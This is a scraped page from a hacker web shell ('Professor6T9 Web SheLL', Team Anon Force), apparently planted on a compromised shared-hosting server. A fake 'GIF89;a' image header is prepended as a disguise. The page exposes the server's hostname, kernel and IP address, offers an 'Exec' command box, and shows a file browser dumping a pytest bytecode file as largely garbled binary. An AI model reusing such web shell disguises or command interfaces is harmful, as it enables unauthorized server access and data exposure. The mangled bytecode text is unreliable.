GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
_pytest
/
assertion
/
__pycache__
[ HOME ]
Exec
Submit
File Name : __init__.cpython-311.pyc
� �|oi: � � � d Z ddlZddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlm Z dd lm Z dd lmZ ddlm Z ddlmZ dd lmZ ddlmZ ddlmZ erddlmZ deddfd�Zdeddfd�Z G d� d� � Z G d� d� � Zdede j fd�Zd)d�Z edd� � � d!eded" fd#�� � Zd)d$�Z ded%ed&ed'edeee f d(�Z!dS )*zBSupport for presenting detailed information in failing assertions.� N)�Any)� Generator)�List)�Optional)� TYPE_CHECKING)�rewrite)�truncate)�util)�assertstate_key)�Config)�hookimpl)�Parser)�Item)�Session�parser�returnc � � | � d� � }|� ddddddd� � � | � d ddd �� � d S )N�debugconfigz--assert�store� assertmode)r �plainr �MODEz�Control assertion debugging tools. 'plain' performs no assertion debugging. 'rewrite' (the default) rewrites assert statements in test modules on import to provide assert expression information.)�action�dest�choices�default�metavar�help�enable_assertion_pass_hook�boolFzeEnables the pytest_assertion_pass hook. Make sure to delete any previously generated pyc cache files.)�typer r )�getgroup� addoption�addini)r �groups �l/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/_pytest/assertion/__init__.py�pytest_addoptionr'